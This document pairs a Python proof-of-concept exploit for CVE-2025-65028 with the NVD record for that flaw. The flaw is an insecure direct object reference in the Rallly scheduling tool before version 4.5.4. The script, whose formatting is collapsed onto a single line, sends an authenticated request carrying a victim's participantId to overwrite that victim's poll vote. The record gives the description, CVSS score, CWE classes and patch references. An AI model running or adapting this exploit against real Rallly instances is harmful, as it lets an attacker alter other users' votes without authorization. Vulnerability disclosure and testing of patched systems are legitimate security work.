CVE-2025-65028

import requests import json # CVE-2025-65028 PoC - Rallly IDOR Vulnerability # Target: Rallly < 4.5.4 # Vulnerability: IDOR in vote update endpoint TARGET_URL = "https://vulnerable-rallly-instance.com" ATTACKER_TOKEN = "attacker_auth_token_here" def exploit_idor(): # Step 1: Get the poll ID and list participants poll_id = "target_poll_id" # Step 2: Identify target participant ID (victim) victim_participant_id = "victim_participant_id" # Step 3: Craft malicious vote update request # The vulnerable endpoint does not verify participant ownership update_url = f"{TARGET_URL}/api/votes/{poll_id}" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Modify victim's vote to favor attacker payload = { "participantId": victim_participant_id, "options": ["2025-12-25"] # Attacker's preferred date } response = requests.post(update_url, headers=headers, json=payload) if response.status_code == 200: print("[+] Vote successfully modified!") print(f"[+] Victim's vote has been changed") else: print(f"[-] Exploitation failed: {response.status_code}") if __name__ == "__main__": exploit_idor()

{"cve": {"id": "CVE-2025-65028", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:50.203", "lastModified": "2025-11-25T15:32:31.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to modify other participants’ votes in polls without authorization. The backend relies solely on the participantId parameter to identify which votes to update, without verifying ownership or poll permissions. This allows an attacker to alter poll results in their favor, directly compromising data integrity. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-pchc-v5hg-f5gp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}